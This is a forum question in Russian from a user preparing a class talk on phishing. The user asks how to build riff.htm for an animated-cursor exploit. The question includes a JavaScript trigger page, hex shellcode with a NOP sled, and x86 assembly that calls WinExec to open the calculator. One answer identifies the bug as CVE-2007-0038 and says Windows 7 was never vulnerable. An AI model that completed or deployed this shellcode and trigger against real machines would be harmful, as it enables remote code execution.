Как я могу настроить эту сборку HEX? - PullRequest
0 голосов
/ 27 мая 2019

В моем классе будет презентация о фисинге. Я нашел очень интересную презентацию в Интернете (https://www.youtube.com/watch?v=iRpKdId5-lE)

В Internet Explorer 8 должно работать (WIN 7).

Должен открыться калькулятор.

И есть шестнадцатеричный код сборки x86, который должен быть в riff.htm, но он не показал riff.htm, поэтому: Как мне создать riff.htm?

Спасибо за помощь!

index.htm:

<script language="javascript">
document.write("<html><body style=\"cursor: url('riff.htm');\">   </body></html>");
wait(500);
window.location.reload();
</script>

Это должно быть на riff.htm:

HEX:

77d8af0a
90909090
90909090
90909090
90909090
90909090
90909090
90909090
90909090
90909090
2068ec8b
68202020
636c6163
50f8458d
86114db8
90d0ff7c

В сборке x86 (должно быть похоже):

MOV EBP,ESP
PUSH 20202020
PUSH 636d6163
LEA EAX,DWORD PTR SS:[EBP-8]
PUSH EAX
MOV EAX,kernel32.WinExec
CALL EAX

1 Ответ

1 голос
/ 27 мая 2019

В Internet Explorer 8 должно работать (WIN 7).

Уязвимость, которую вы описываете, звучит как CVE-2007-0038 . Эта уязвимость была исправлена ​​за несколько лет до выпуска Windows 7 - системы Windows 7 никогда не затрагивались.

В любом случае неясно, как это будет иметь отношение к презентации о фишинге.

Добро пожаловать на сайт PullRequest, где вы можете задавать вопросы и получать ответы от других членов сообщества.
...